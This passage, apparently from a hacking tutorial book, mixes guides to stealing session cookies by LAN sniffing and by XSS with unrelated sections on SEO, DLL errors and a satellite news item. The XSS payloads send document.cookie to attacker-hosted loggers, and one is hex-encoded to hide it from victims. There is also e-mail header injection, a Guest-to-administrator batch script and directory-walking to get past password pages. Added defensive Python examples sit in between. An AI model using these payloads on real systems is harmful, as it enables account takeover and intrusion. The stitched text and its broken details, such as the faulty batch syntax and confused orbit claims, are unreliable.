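if __name__ == "__main__":
    print(check_arp_table(parse_arp_table(ARP_BEFORE), PINNED))   # []
    for alert in check_arp_table(parse_arp_table(ARP_AFTER), PINNED):
        print("ALERT:", alert)
```

On a live machine you would feed it the real table, for example `subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout`, and record the router's MAC while the network is known-good. Keep in mind that a static entry fixes only this computer's view of the router; the attacker's -r side (the router's own ARP table) is not protected by anything you do on the client, so the duplicate-MAC check is still worth running.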

When the attacker runs ARP spoofing again, our ARP table won't change because we already made it static.

Conclusions:
1. To prevent ARP spoofing and man in the middle attacks in your local area network, you need to add a static ARP entry.
2. This trick becomes troublesome if your router changes frequently, so if you use this prevention method you need to delete the old entry and add the new one whenever it changes.
3. You can download and use my Static ARP routing changer to change your static ARP routing automatically: Download Static ARP Changer

Hope you found it useful.

Black Hat and White Hat SEO Techniques

Black Hat (Spam) SEO

In the field of SEO, Black Hat is the unethical approach to SEO and must be avoided at all costs. Webmasters assume black hat SEO will strengthen their position quickly, bump them up and sit them on top of Google. That is not the case. At some point they will be caught, thrust down by the search engines and permanently banned.

Avoid shortcuts, and steer clear of any company that promises you a #1 search engine ranking overnight for a ridiculously low price (a real scam!). Black hat is a practice which deliberately deceives the search engines, and it only hurts in the long term. Black Hat SEO includes the following unethical practices:

* Keyword stuffing - putting too many keywords in your content/site (it makes no sense); this is black hat and should be avoided.
* Hidden text - putting white text against a white background.
* Cloaking - visitors see one thing on the website, but the content is presented in a different way to the search engine spiders.
* Cookie stuffing - cookies are text files that are stored by web browsers on computers (here on behalf of third-party sites). The catch: a consumer visits the website within 60 days (a cookie is stored for 60 days) and makes a purchase; as a result, the affiliate receives a commission from the fraudulent sale.
* Redirects - creating a full page of unique content and, once it ranks highly, redirecting it to another page on your site (i.e. the shopping cart page).

Ranking #1 on Google

You can get to the top when it comes to Google rankings. First you have to find out how much you know about SEO and examine the competition in your market. When you reach the top of Google, big things happen for you and your business! You start to get busy and you have more than enough companies/customers. Check out the following white hat tips:

* Spend at least 30 minutes a day working on your SEO - it pays to make this everyday investment in your site/business!
* You do not need to know everything about SEO - there is a lot of conflicting information out there. Research the various sites, resources, etc., and choose what works best for your site/business!
* Outsource SEO work to a professional if you feel that you do not know enough about SEO - but it helps to know the basics of SEO. A good SEO expert will always guide you in the right direction; investigate the companies/entities for reputation and make sure you hire an SEO pro!

White Hat (Ethical) SEO

White hat SEO is called an "ethical stance" that opposes the abuse of electronic media. Do the right thing: optimize the text (put the title and description where they should be). Implement accessibility standards (for example, so that a search engine can understand what a picture contains, add the "alt text" parameter with a brief description). Create a link structure: the site's pages must be linked to one another.

A black hat is the opposite of white hat: it attempts to breach what is considered ethical SEO. Black hats may use low quality links or unwanted pornographic sites, pharmacies, etc. Those who practice Black Hat SEO "inflate" PR by placing a link on a page with a high PageRank, but if it is deleted, the PR of the page drops in the next Google update. A Black Hat SEO (spammer) does the following:

* Cloaking: a page hidden behind a seemingly normal web page, served to search engines but not to visitors, with mostly plain text, h1, bold and many links that would never appear on the real page. This is the most common technique among spammers and is considered counterproductive, because the hidden text should be what web users get.
* Buying links (Google states that this is against its rules).
* Auto-generated content (automatically generated or copied garbage content, used to get your pages into the search engine indexes, scattered across different servers, domains and content formats).
* Keyword abuse (a spammer puts all kinds of search words in a title to catch the largest number of web searches, without any coherence).
* Duplicate content (taking a text and putting it on multiple pages to get more pages indexed).
* Hidden text (hidden links and keywords on a website using hidden divs, tiny fonts or white text on a white background).

The biggest problem with Black Hat SEO is the consequences that may arise for the owner of the page. The most ominous is complete removal from the Google results. This is usually due to Google detecting the SEO and punishing the malicious page in this way. Another important term to know is Gray hat, referring to practices somewhere between the two, using both kinds of methods as suits the page.

White Hat SEO Tips

When it comes to ethical SEO technique, the white hat is about how aggressively you need to approach SEO. Think of "value" when it comes to white hat SEO. The white hat is the ethical search technique used by big players like Google. White hat SEO tactics are aggressive, "not stopping until you reach the top" - every

time! White hat SEO is any element that you add to your sites, blogs, etc. that adds value and credibility.

Common website hacking methods!

I will show you those common methods by which these sites get hacked. Let's see an overview below. 95% of web applications have the following vulnerabilities:

• Cross-site scripting (80 percent)
• SQL injection (62 percent)
• Parameter tampering (60 percent)
• Cookie poisoning (37 percent)
• Database server (33 percent)
• Web server (23 percent)
• Buffer overflow (19 percent)

Some are explained below; I will post details later.

1. Cross site scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

2. SQL injection
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

3. Parameter tampering
The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control.
Example: Let's take an example in which a web application permits a user to select his profile from a combo box and debit the account:

http://www.attackbank.com/default.asp?profile=741&debit=1000

In this case, an attacker could tamper with the URL, using other values for profile and debit:

http://www.attackbank.com/default.asp?profile=852&debit=2000

Page 200


Power Of Hacking速 This can be done by various addons available for mozilla. Cookie poisoning: Cookie Poisoning attacks involve the modification of the contents of a cookie (personal information stored in a Web user's computer) in order to bypass security mechanisms. Using cookie poisoning attacks, attackers can gain unauthorized information about another user and steal their identity. This involves the use of cookie stealing script and an addon or software to replace these cookies with yours. Buffer overflow: In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. They are thus the basis of many software vulnerabilities and can be maliciously exploited. The principle of exploiting a buffer overflow is to overwrite parts of memory that are not supposed to be overwritten by arbitrary input and making the process execute this code. To see how and where an overflow takes place, look at how memory is organized. A page is a part of memory that uses its own relative addressing, meaning the kernel allocates initial memory for the process, which it can then access without having to know where the memory is physically located in RAM. Cookie Stealing Attack: Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.

Using this method you can hack any account like Facebook, Twitter, Gmail, Hotmail, Skype and Yahoo etc. This works on a LAN (Local Area Network). The best places to hack are a university, cafe or public place where computers are on one LAN, the simplest example being Wi-Fi.

What are cookies, and how are stolen cookies used?

Cookies are files stored on any computer by a website when you visit it. The cookie is used by the web server to authenticate the real user. For example, when you log in to Facebook, a unique string is generated; one copy is saved on the web server and the other is saved in your browser as a cookie file. Both are matched when you open an account. So then, finally we will start.

Step 1: Download Wireshark and install it.
Step 2: Next, open Wireshark and then click on Interface.
Step 3: Next, choose an interface which is receiving and sending packets and click on Start.
Step 4: Continue the sniffing for around 10 minutes.
Step 5: After a maximum of 10 minutes, stop the sniffing by going to the Capture menu.
Step 6: This is the important step; now filter to http.cookie contains "datr". Then filter all, searching for HTTP cookies with the name datr; that is Facebook's authentication cookie.
Step 7: Now click on it and then go to Copy > Bytes > Printable Text only.
Step 8: For the next step you must have 3 things: 1. Mozilla Firefox [browser] 2. Greasemonkey [add-on] 3. Cookie Injector [code]. Then open facebook.com; make sure you are not logged in.
Step 9: Press Alt+C to bring up Cookie Injector and then simply paste the cookie value into it.
Step 10: Now refresh your page, and finally you enter the victim's account.

Cross Site Scripting (Using a hole to Hack with XSS)

1. We find a blog which allows users to input data.
2. This data is displayed, unedited or unsanitised, on the blog index page.
3. We want to inject an XSS to log the administrative user's cookies.
4. We want to log in with the cookie we have stolen.

Note: This is for educational purposes, for designers or for my readers to make their websites safe.

What we shall need: Here's a list of things you will need throughout the tutorial:
Mozilla Firefox (use an old version, not the latest).
FF add-on: Add & Edit Cookies.
FF add-on: Live HTTP Headers.
An ACTIVE cookie logger. (Google it yourself; I don't want to put it here and break laws.)
A basic understanding of JavaScript is an advantage, but not essential. (Refer to www.w3schools.com)
An XSS vulnerability to test and exploit. Refer to my old post on XSS.
Hosting is up to you; try a free PHP web host, 000webhost etc.
The desire and dedication to learn. [Yourself.]

Identifying & Exploiting the Vulnerability:

Identifying an XSS vulnerability can be pretty straightforward in most cases. A typical method of testing for an XSS vulnerability would be the infamous 'Alert' test. Anyone with a basic knowledge of JavaScript will know what this is. This test will make an alert box, or message box, pop up on the screen. This is done by executing the JavaScript function alert.

<script>alert('hackersthirst.com')</script>

This would display a message box with hackersthirst.com as the message. To perform this test we want the page in question to print out the script, so the browser will execute it. So in this case, using the included vulnerable test page, input the string <script>alert('hackersthirst.com')</script>. Now the page will execute this and you should get an alert box displaying the message 'hackersthirst.com'.

Another method of testing for the vulnerability is the document.write method. The same concepts and structure are applied to this method as to the alert method; we're just using the document.write function instead of the alert function. So this time we insert:

<script>document.write('hackersthirst.com')</script>

This time the script will return the string 'hackersthirst.com' (without quotes) and write it to the page, where the string is supposed to be shown. Below I am giving a short description of how to exploit this.

Exploiting the XSS hole:

After identifying the XSS hole, what will a hacker do? It is demonstrated by the given example (in this example we will be covering cookie stealing); we will go over setting up our logger and a few methods of doing so.

Example 1:
Our cookie logger URL: http://site.com/cookielogger.php
Vulnerable Page: http://someblog.com/index.php
Injection Point: http://someblog.com/post.php

Now we have all this set up, we can crack on. You can use the following methods to log cookies using JavaScript:

<script>location.href='http://site.com/cookielogger.php?cookie='+cookie</script>
<script>document.location='http://site.com/cookielogger.php?cookie='+cookie</script>
<script>window.open('http://site.com/cookielogger.php?cookie='+cookie)</script>
<script>window.location='http://site.com/cookielogger.php?cookie='+cookie</script>

Once you have posted this to the blogging system, and it's echoed on index.php, we just have to be patient and hope the administrator of the site visits it soon, so we can get their cookie.

Another method I want to go over is the <script src=> method. The only difference with this one is that the main script is kept off-site, is fetched by the <script src> tag, and is then executed on the page. This is advantageous in many ways. It can reduce the size of our script on the target site for one, and secondly it can be changed if we want to change the functionality of our XSS. This type of XSS is usually more practical for worms and keyloggers, but is definitely worth knowing.
Example 2:
Our cookie logger URL: http://site.com/cookielogger.php
Our script URL: http://site.com/script.js
Vulnerable Page: http://someblog.com/index.php
Injection Point: http://someblog.com/post.php

Here is how we include our foreign script:

<script src='http://site.com/script.js'></script>

Inside the script we just need the logger; use a function from Example 1. An example of our script would be:

location.href='http://site.com/cookielogger.php?cookie='+cookie;

Again, like anything, patience is a virtue. Here the site is your own hosting site, hosting the cookielogger script.

Possible Limitations and Basic Filter Evasion Techniques:

The filter I will show you is a filter which removes the '<script>' and '</script>' tags. While a very basic and common method of filtering, it is ridiculously easy to bypass.

Example 1 ~ Tag Removal: I insert the JavaScript '<script>alert('XSS')</script>', and it returns the string: alert('XSS'). Never fear, there is a way around this. If I now insert this: '<scr<script>ipt>alert('XSS')</scr</script>ipt>', the filter will remove the tags and echo what's left, which is: <script>alert('XSS')</script>. There are other methods also. Use Google.
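The tag-removal filter above fails because it edits the markup instead of neutralising it; the fix on the defending side is output encoding, which turns every '<' into text the browser will never parse. The following is an added example, not code from the tutorial: it runs the nested-tag payload from the paragraph above through the weak filter and through proper HTML escaping, and, for the "Common website hacking methods" section earlier, shows the server-side ownership check that stops the profile=852&debit=2000 tampering. The function names, the account table and the session value are constructed for this example.

```python
import html

# Added example, not from the tutorial.  Payload and the profile/debit URL
# parameters come from the text; function names, balances and the session
# profile are constructed.

def naive_strip_filter(value):
    """The weak filter described above: delete literal <script> tags once."""
    return value.replace("<script>", "").replace("</script>", "")

def escape_for_html(value):
    """Output encoding for an HTML body: the browser renders the text, never
    parses it as markup.  Quotes are escaped too, so the same helper is safe
    inside double-quoted attributes."""
    return html.escape(value, quote=True)

def render_comment(value, sanitizer):
    """Place a user-supplied comment in the page using the given strategy."""
    return '<div class="comment">%s</div>' % sanitizer(value)

NESTED_TAG_PAYLOAD = "<scr<script>ipt>alert('XSS')</scr</script>ipt>"

# --- parameter tampering: authorization comes from the session, not the URL

ACCOUNTS = {741: 5000, 852: 9000}   # constructed balances keyed by profile id

def debit_account(session_profile, params, accounts=ACCOUNTS):
    """Handle default.asp?profile=N&debit=M safely.

    The URL's profile value is a claim, not a fact: the only profile this
    request may debit is the one the session is logged in as.  Amount is
    validated as a positive integer before any balance is touched.
    """
    try:
        requested = int(params["profile"])
        amount = int(params["debit"])
    except (KeyError, ValueError):
        raise ValueError("profile and debit must be integers")
    if amount <= 0:
        raise ValueError("debit must be positive")
    if requested != session_profile:
        raise PermissionError("profile %d does not belong to this session" % requested)
    if accounts[requested] < amount:
        raise ValueError("insufficient funds")
    accounts[requested] -= amount
    return accounts[requested]

if __name__ == "__main__":
    # weak filter: what reaches the browser is a live <script> element
    print(render_comment(NESTED_TAG_PAYLOAD, naive_strip_filter))
    # escaping: the same payload is shown as inert text
    print(render_comment(NESTED_TAG_PAYLOAD, escape_for_html))
    print(debit_account(741, {"profile": "741", "debit": "1000"}))   # 4000
    try:
        debit_account(741, {"profile": "852", "debit": "2000"})
    except PermissionError as e:
        print("blocked:", e)
```

Escaping is context-specific: html.escape is right for text nodes and quoted attributes, while values placed inside a JavaScript string, a URL or a CSS block each need their own encoder. Marking the session cookie HttpOnly additionally keeps it out of document.cookie, so even a script that does slip through cannot read it the way the loggers in the examples above do.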

If the URL of your hosting site is too long, a smart tip is to use its IP address instead of the URL.

What to do when you get cookies in the .txt file on your hosting: These are the steps:

1. Open Firefox.
2. Click on Tools in the menu bar.
3. Click on Cookie Editor.
4. Click on Add.

Adding the cookie:

5. In Name, add the name of that cookie (the bit before the =).
6. In Content, add the value.
7. In Host, add .site.com, unless it is a subdomain or otherwise stated (the dot in front of the domain name is important).
8. In Path, write /, unless you have the exact path where you want the cookie to be active.

Repeat this procedure until every cookie has been added. Once this is done, you can navigate to the website and check to see if you have logged in. So, that's a short guide on XSS.

Cross Site Scripting

If anyone tries these hacks against any organization or whatever, so as to trespass its security measures, it brings him under legal prosecution. This tutorial is intended for the improvement of security, for pentesting, and for investigations by legal security agencies.

Requirements:
- A cookie stealer code: Get it from here
- Free web hosting service
- Basic knowledge about XSS
- Basic knowledge about computer cookies

Cookie stealing is the process of exploiting an XSS vulnerability (non-persistent or persistent) to steal the cookie from a victim who visits the infected link. These cookies will be used to compromise their accounts.

Step 1: Creating the Cookie Stealer PHP file

Get the cookie stealer from the link I mentioned. In that post, I have explained three versions of cookie stealer. We are going to use the third version.

- Copy the code.
- Open Notepad and paste the code.
- Save the file with the .php extension, e.g. Stealer.php.

Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the file name we give in the PHP file. Now you will have two files:

1. Stealer.php
2. log.txt

What do these two files do exactly? The Stealer.php file gets the IP address and cookie and stores the data in the log.txt file. The log.txt file holds the cookies and IP address details.

Step 2: Register with a free web-hosting service and log in to your cPanel. Now open the File Manager in cPanel. Upload Stealer.php and log.txt to the root folder or the public_html folder. Now the stealer will be at hxxp://www.YourSite.com/Stealer.php.

Step 3: Exploiting the XSS Vulnerability

So far, we have sharpened our saw. Now we are going to use it. Once you have set up everything and found a vulnerable site, inject the following code into the vulnerable site:

<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

For example:

hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

Cookie Stealing with Non-Persistent vs Persistent XSS:

Persistent: if you inject this code into a persistent-XSS-vulnerable site, it will be there until the admin finds it. It will be shown to all users, so attackers don't need to send any link to others. Whoever visits the page will be a victim.

Non-Persistent: In the case of a non-persistent attack, the attacker will send the link to victims. Whenever they follow the link, it will steal the cookie. Most sites are vulnerable to non-persistent XSS. In the non-persistent case, attackers send victims the injected link. For example:

hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link clearly shows the script. Hackers can hex-encode this script so that the victim can't see it. For example:

hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Still, the link looks long. The attacker uses one more trick to hide the long URL, i.e. URL-shortening sites. There are lots of sites that shorten a long URL into a tiny URL. For example: hxxp://www.tinyexample.com/twrwd63

Once the victim follows the link, his cookie will be stored in the log.txt file.

How to be secure from this attack?

- Use the NoScript add-on. This is the best protection to stay away from XSS.
- Never click a shortened URL.
- Sometimes you may want to follow the shortened link. If so, then clear all cookies in your browser and visit through a proxy or VPN (it will hide your IP).

(Later we will cover security tips for site admins, so stay tuned.)
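An added example, not code from the original tutorial, for the site-admin side that the text defers: the session cookie that `document.cookie` in the payload above harvests is only readable from script because it lacks the HttpOnly flag. The Python below builds a Set-Cookie header with HttpOnly, Secure and SameSite using only the standard library, and audits sample headers (constructed here) for those three attributes. Names such as `audit_set_cookie` and the cookie values are my own.

```python
# Added example (not from the book): issuing a session cookie that the
# cookie-stealing script above cannot read, and auditing Set-Cookie headers
# for the attributes that make the difference.
from http.cookies import SimpleCookie

REQUIRED_ATTRS = ("HttpOnly", "Secure", "SameSite")


def build_session_cookie(session_id: str) -> str:
    """Return a Set-Cookie header value for a session cookie that script
    cannot read (HttpOnly), that is never sent over plain HTTP (Secure),
    and that is not attached to cross-site requests (SameSite=Strict)."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["path"] = "/"
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"   # attribute supported from Python 3.8
    return cookie["session"].OutputString()


def audit_set_cookie(header_value: str) -> list:
    """Return the names of the protective attributes missing from one
    Set-Cookie header value, in REQUIRED_ATTRS order (empty list = fine)."""
    parts = [p.strip() for p in header_value.split(";")[1:]]
    present = {p.split("=", 1)[0].strip().lower() for p in parts if p}
    return [attr for attr in REQUIRED_ATTRS if attr.lower() not in present]


# Constructed sample headers, as a response scanner would see them.
SAMPLE_HEADERS = {
    "weak":  "PHPSESSID=abc123; Path=/",
    "fixed": build_session_cookie("abc123"),
}

if __name__ == "__main__":
    for label, value in SAMPLE_HEADERS.items():
        print(f"{label:5}: {value}")
        print(f"       missing: {audit_set_cookie(value) or 'none'}")
```

HttpOnly stops the `document.cookie` read shown in this section outright; Secure and SameSite do not stop XSS but limit what a stolen or forged request can do, so an audit that reports all three gives an admin a concrete checklist per cookie.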

What is XSS? XSS is known as Cross Site Scripting. XSS is a web application vulnerability. Using this vulnerability, an attacker can inject their own malicious client-side code (JavaScript, ...) into a website. This XSS-infected web page can carry malicious code to other users. The innocent users will run the script (by visiting the page) without knowing the problem behind it. Using XSS, an attacker can steal cookies, sessions (session hijacking), and other confidential data.

E-mail Form Injection - Vulnerability

E-mail injection is not like SQL injection, because after looking at its name a person first thinks of something interesting like SQL injection; in fact it can be used for spoofing. It is the easiest task, so I won't make it long. Many sites have a contact form, also called a feedback form. Of course most of them have a secure feedback form, but some new site builders can make mistakes in it. So a feedback form vulnerable to e-mail injection can be used to send a carbon copy to another person rather than to the site. You can find a field in the form with the name *YOUR EMAIL*. Just by entering the following string you can use their feedback form:

"sender@somesite.com%0ACc:victim@victimsdomain.com%0ABcc: victim2@victimsdomain.com"

The above injection makes a carbon copy of your subject be sent to the user ID you write in place of *victim@victimsdomain.com*. As you can see there is also *victim2*, which means that the subject of your mail is sent to another person as well; you can add as many people as you want. Back to the first statement of the injection: there is *sender@somesite.com* written, so just replace it with any site you want. It could be Facebook, in which case you might change that statement to *admin@facebook.com*.

Fighting With Missing .DLL Errors and Recovering .DLLs

I am going to discuss a major problem which the majority of our readers, even the common computer user, face while running an application. There may be many factors behind the "application failed to load" dialog box appearing. I'll discuss some of them, and using my pattern you can fight almost 90% of such errors. The other 10% you can't, because you won't be able to work out what kind of problem is occurring. Well, personally I have resolved many such errors quite successfully without getting impatient. It is my experience that people delete the data of the application which fails to load. LOL, that is quite bad; we must try to resolve rather than destroy.

The first error is related to gamers who want to run games but fail to do so.

DirectX .dll error - mostly when you try to run games: This is the case where you download a game and you have XP, or even Windows 7, running, but there is an old version of DirectX installed, so a .dll-file-missing error occurs. Now, you might think that the setup provided for the program is corrupt, and thus you may delete all your hard work. But there is a very easy solution in 3 steps:

1. Go here and download the latest version of DirectX.
2. Install DirectX and then restart your computer (recommended by HT).
3. After that try to execute the program; it will run successfully.

Other types of .dll errors and how to fight them:

First Action - Finding the function of the .dll:

1. Copy the name of the .dll shown in the error.
2. Paste that into Google search and make queries like, for example, when I am trying to find the purpose of msvcrt.dll, I'll search "Purpose of msvcrt.dll", and what I got in the 3rd link is this: msvcrt.dll is the file helper that runs as part of what is known as the Microsoft Visual C++ Run Time library (hence, msvcrt).
3. That is enough for you to know its purpose. After that you may try to resolve it. Here I'll give you two websites which you can use to download such .dlls and put them manually in your system.

Second Action - Recovering such .dlls: You can make use of these two websites:

- DLL-ERROR
- DLL-Files

You can search for any .dll file you want on the sites listed above, read its description, and download it. Copy the name of the .dll file given in the error of the specific application when executing it. Search for that .dll on either of the above sites and download it. Mostly, that .dll goes in c:/windows/system32: just copy the downloaded .dll (extract it if it is in an archive) and paste it into c:/windows/system32, or else, if that specific application still doesn't work, paste the .dll into the directory of the installed program.

Hackers Plan to Launch Satellite for Internet to Bypass SOPA

The term hacker can be used with several meanings; among them there are two major ones, the "positive" and the "negative". Hackers facing the Internet ban from the United States as a result of SOPA (Stop Online Piracy Act) have made a plan to launch their own satellite into space to provide an Internet that may be free from all kinds of bans and restrictions. This group of hackers belongs to Germany.

What is this plan and how is this satellite going to work? The plan mainly consists of launching a single satellite into space, which will be a low-orbit satellite. It will surely work on solar power, as per the general rule of satellite operation, and will communicate with ground stations to make a network. This network will operate like a GPS system and will be called the "Hackerspace Global Grid (HGG)". When any station is within the satellite's range, it will take the signals and direct them to the other stations as well, and a user can gain permanent access to the network. This theory seems workable, but there are certain hurdles in the plan which need to be resolved first.

Some Major Basic Hurdles: As we know, with the advancement of technology we are all able to travel in space and to send satellites into Earth orbit using rockets. But this technology is still hellishly costly. Plus, there are no binding rules for space like there are on Earth, and no single country can govern space, so anyone can make this satellite stop working without any specific legal permission. In order to make it geosynchronous the radius of the orbit will surely decrease and it will move faster, and for the HGG project this distance seems too large for the signals to be transmitted with 100% quality.

So what's next with the HGG project? The team is still moving forward to make this possible and is deciding to build the ground stations. If you are fascinated with this project and want such a network for the world, then go here: Constellation (http://aerospaceresearch.net/constellation/) to join this project, a project HGG has joined for collaboration. For further detailed sources about this news, rather than us, visit BBC NEWS.
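Returning to the e-mail form injection described earlier on this page: as an added example (not code from the book), the Python below URL-decodes the quoted injection string, shows how a mailer that simply concatenates the form field into a header ends up with Cc: and Bcc: lines it never set, and gives a validator that rejects any value containing CR/LF or anything beyond a bare address. The addresses are the placeholders from that section; the function names and the deliberately strict address pattern are mine.

```python
# Added example (not from the book): how "%0ACc:" turns one header into
# several, and a validator that rejects it.
import re
from urllib.parse import unquote

# One address, no whitespace, no control characters: good enough for a
# feedback form's "your e-mail" field (stricter than RFC 5322 on purpose).
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def is_safe_sender(value: str) -> bool:
    """True only if the submitted value is a single plain address with no
    CR/LF, so it can never start a new header line."""
    if "\r" in value or "\n" in value:
        return False
    return ADDRESS_RE.fullmatch(value) is not None


def headers_as_mailer_would_see(sender: str) -> list:
    """Show what a naive mailer that does 'From: ' + sender produces: each
    embedded newline becomes an extra header the site never set."""
    raw = "From: " + sender
    return [line for line in raw.replace("\r\n", "\n").split("\n") if line]


# The injection string quoted in the text, URL-decoded as the server would.
INJECTED = unquote("sender@somesite.com%0ACc:victim@victimsdomain.com%0ABcc: victim2@victimsdomain.com")
HONEST = "sender@somesite.com"

if __name__ == "__main__":
    for value in (HONEST, INJECTED):
        print("accepted:", is_safe_sender(value))
        for line in headers_as_mailer_would_see(value):
            print("   ", line)
```

The two checks are deliberately separate: rejecting CR and LF is what closes the injection, and the address pattern catches the same thing plus sloppier inputs; a mail library that refuses newlines in header values (as Python's email package does under its default policy) is a second layer, not a replacement for validating the field.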

Hack Administrator Account from Guest Account. Yes!! That is quite possible. All you need to do is to follow the procedure below.

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Copy this to Notepad and save the file as "Guest2admin.bat"; then you can double-click the file to execute it or run it in cmd. It works...

----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN

When you install Windows XP an Administrator account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode. First you must ensure that the Administrator account is enabled:

1. Open Control Panel
2. Open Administrative Tools
3. Open Local Security Policy
4. Expand Local Policies
5. Click on Security Options
6. Ensure that "Accounts: Administrator account status" is enabled

Then follow the instructions from the "Win2000 Logon Screen Tweak", i.e.:

1. Open Control Panel
2. Open User Accounts
3. Click "Change the way users log on or log off"
4. Untick "Use the Welcome Screen"
5. Click Apply Options

You will now be able to log on to Windows XP as Administrator in Normal Mode.

EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN!!

Start the Registry Editor and go to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\

Right-click an empty space in the right pane and select New > DWORD Value. Name the new value Administrator. Double-click this new value and enter 1 as its Value data. Close the Registry Editor and restart.

Hacking Password Protected Websites


There are many ways to defeat JavaScript-protected websites. Some are very simplistic, such as hitting [Ctrl-Alt-Del] when the password box is displayed, or simply turning off JavaScript capability, which will dump you onto the default page. You can try manually searching for other directories by typing the directory name into the URL address box of your browser. I.e., you want access to www.target.com: try typing www.target.com/images (almost every web site has an images directory). This will put you into the images directory and give you a text list of all the images located there. Often the title of an image will give you a clue to the name of another directory. I.e., in www.target.com/images there is a .gif named gamestitle.gif. There is a good chance then that there is a 'games' directory on the site, so you would then type in www.target.com/games, and if it is a valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all directories, or even mirror a complete server. They are indispensable for locating hidden files and directories.

What do you do if you can't get past an opening "Password Required" box? First do a WHOIS lookup for the site. In our example, www.target.com, we find it's hosted by www.host.com at 100.100.100.1. We then go to 100.100.100.1, launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K (not many HTML pages are bigger than this). This speeds things up some and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bedtime. Once you have an image of the entire server, you look through the directories listed and find /target. When we open that directory, we find its contents and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html. This would be the index page that would be displayed had you gone through the password procedure and allowed it to redirect you here. By simply typing in the URL www.target.com/games/zip/zipindex.html you will be on the index page and ready to follow the links for downloading.
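From the defender's side of the directory-walking and site-mirroring described above, an added example that is not part of the original text: Python that parses a few constructed Apache-style access-log lines and flags clients that accumulate many distinct 404s, request many bare directory listings, or use write methods such as PUT (the last rule also covers the WebDAV upload in the section that follows). The thresholds, IP addresses and log lines are my constructions.

```python
# Added example (not from the book): spotting directory guessing, site
# mirroring and WebDAV-style uploads in web-server access logs.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

# Thresholds are assumptions for the demo; tune them per site and window.
NOT_FOUND_LIMIT = 4       # distinct missing paths from one client
DIR_LISTING_LIMIT = 3     # distinct bare-directory requests from one client
EXPECTED_METHODS = {"GET", "HEAD", "POST"}


def parse_line(line: str):
    """Return the fields of one combined-format log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_probing_clients(lines) -> dict:
    """Map client IP -> list of reasons for clients whose traffic looks like
    directory guessing (many distinct 404s), listing/mirroring (many bare
    directory fetches) or content upload (unexpected HTTP methods)."""
    not_found = defaultdict(set)
    dir_hits = defaultdict(set)
    writes = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], rec["status"]
        if method not in EXPECTED_METHODS:
            writes[ip].add(method)
        if status == "404":
            not_found[ip].add(path)
        elif status == "200" and path.endswith("/"):
            dir_hits[ip].add(path)
    findings = {}
    for ip in sorted(set(not_found) | set(dir_hits) | set(writes)):
        reasons = []
        if len(not_found[ip]) >= NOT_FOUND_LIMIT:
            reasons.append(f"{len(not_found[ip])} distinct 404s")
        if len(dir_hits[ip]) >= DIR_LISTING_LIMIT:
            reasons.append(f"{len(dir_hits[ip])} directory listings")
        if writes[ip]:
            reasons.append("unexpected methods: " + ", ".join(sorted(writes[ip])))
        if reasons:
            findings[ip] = reasons
    return findings


# Constructed sample log (combined log format); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2012:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2012:10:00:02 +0000] "GET /images/ HTTP/1.1" 200 4120 "-" "Wget/1.13"
198.51.100.9 - - [10/Mar/2012:10:00:03 +0000] "GET /games/ HTTP/1.1" 200 2210 "-" "Wget/1.13"
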